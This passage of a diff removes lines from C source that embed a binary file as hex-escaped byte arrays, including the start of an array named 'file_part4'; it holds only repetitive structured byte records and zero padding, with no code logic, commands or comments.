-"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
-"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
-"\x5f\x71\x00\x00\x60\x71\x00\x00\x63\x71\x00\x00\x68\x71\x00\x00"
-"\x75\x71\x00\x00\x84\x71\x00\x00\x8c\x71\x00\x00\x41\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01"
-"\x12\x64\x24\xff\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61"
-"\x24\x01\x00\xbd\x00\x00\x6b\x64\xa5\x06\x00\x00\x16\x24\x01\x17"
-"\x24\x01\x49\x66\x01\x00\x00\x00\x02\x96\x46\x00\x05\xd6\x18\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x08\xd6\x88\x00\x06\xba\xff\x0d\x03"
-"\xcf\x08\xab\x11\x08\x18\x57\x1f\xb4\x25\x00\x06\x53\x03\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\xc2\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x06\xdc\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x4f\x07\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x17\xf6\x03\x00\x00\x18"
-"\xf6\x03\x00\x00\x1a\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1b"
-"\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1c\xd6\x18\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x1d\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
-"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\x61\xf6\x03\x00\x00\x00\x06"
-"\x8c\x71\x00\x00\x9a\x71\x00\x00\x9b\x71\x00\x00\x9e\x71\x00\x00"
-"\xa3\x71\x00\x00\xb0\x71\x00\x00\xbf\x71\x00\x00\xf3\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\xf3\xf5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64"
-"\x98\x07\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00"
-"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08"
-"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f"
-"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
-"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46"
-"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
-"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
-"\xbf\x71\x00\x00\xc6\x71\x00\x00\xce\x71\x00\x00\xcf\x71\x00\x00"
-"\xd2\x71\x00\x00\xd7\x71\x00\x00\xe4\x71\x00\x00\xf3\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64"
-"\x8b\x08\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00"
-"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08"
-"\x9a\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f"
-"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
-"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46"
-"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
-"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
-"\xe4\x71\x00\x00\xf3\x71\x00\x00\xfb\x71\x00\x00\xff\x71\x00\x00"
-"\x00\x72\x00\x00\x03\x72\x00\x00\x07\x72\x00\x00\xf3\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64"
-"\x7e\x09\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00"
-"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08"
-"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f"
-"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
-"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46"
-"\x00\x61\xa3\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
-"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
-"\x07\x72\x00\x00\x13\x72\x00\x00\x22\x72\x00\x00\x33\x72\x00\x00"
-"\x3b\x72\x00\x00\x3c\x72\x00\x00\x3f\x72\x00\x00\xf3\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\xf3\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64"
-"\x71\x0a\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00"
-"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08"
-"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f"
-"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
-"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46"
-"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
-"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
-"\x3f\x72\x00\x00\x44\x72\x00\x00\x4e\x72\x00\x00\x5d\x72\x00\x00"
-"\x67\x72\x00\x00\x6b\x72\x00\x00\x6c\x72\x00\x00\xf3\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64"
-"\x64\x0b\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00"
-"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08"
-"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f"
-"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
-"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
-"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46"
-"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
-"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
-;
-char file_part4[]=
-"\x6c\x72\x00\x00\x6f\x72\x00\x00\x75\x72\x00\x00\x80\x72\x00\x00"
-"\x8f\x72\x00\x00\x96\x72\x00\x00\x9e\x72\x00\x00\xf3\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
-"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
-"\x9e\x72\x00\x00\x9f\x72\x00\x00\xa2\x72\x00\x00\xa8\x72\x00\x00"
-"\xb6\x72\x00\x00\xc5\x72\x00\x00\xd4\x72\x00\x00\x41\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01"
-"\x12\x64\x24\xff\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61"
-"\x24\x01\x00\xbd\x00\x00\x6b\x64\x57\x0c\x00\x00\x16\x24\x01\x17"
-"\x24\x01\x49\x66\x01\x00\x00\x00\x02\x96\x46\x00\x05\xd6\x18\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04"
-"\x01\x00\x00\x04\x01\x00\x00\x08\xd6\x88\x00\x06\xba\xff\x0d\x03"
-"\xcf\x08\xab\x11\x08\x18\x57\x1f\xb4\x25\x00\x06\x53\x03\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\xc2\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x06\xdc\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x4f\x07\x00\x00"
-"\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x17\xf6\x03\x00\x00\x18"
-"\xf6\x03\x00\x00\x1a\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00"
-"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1b"
-"\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
-"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1c\xd6\x18\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
-"\xff\x00\x00\x00\xff\x1d\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff"
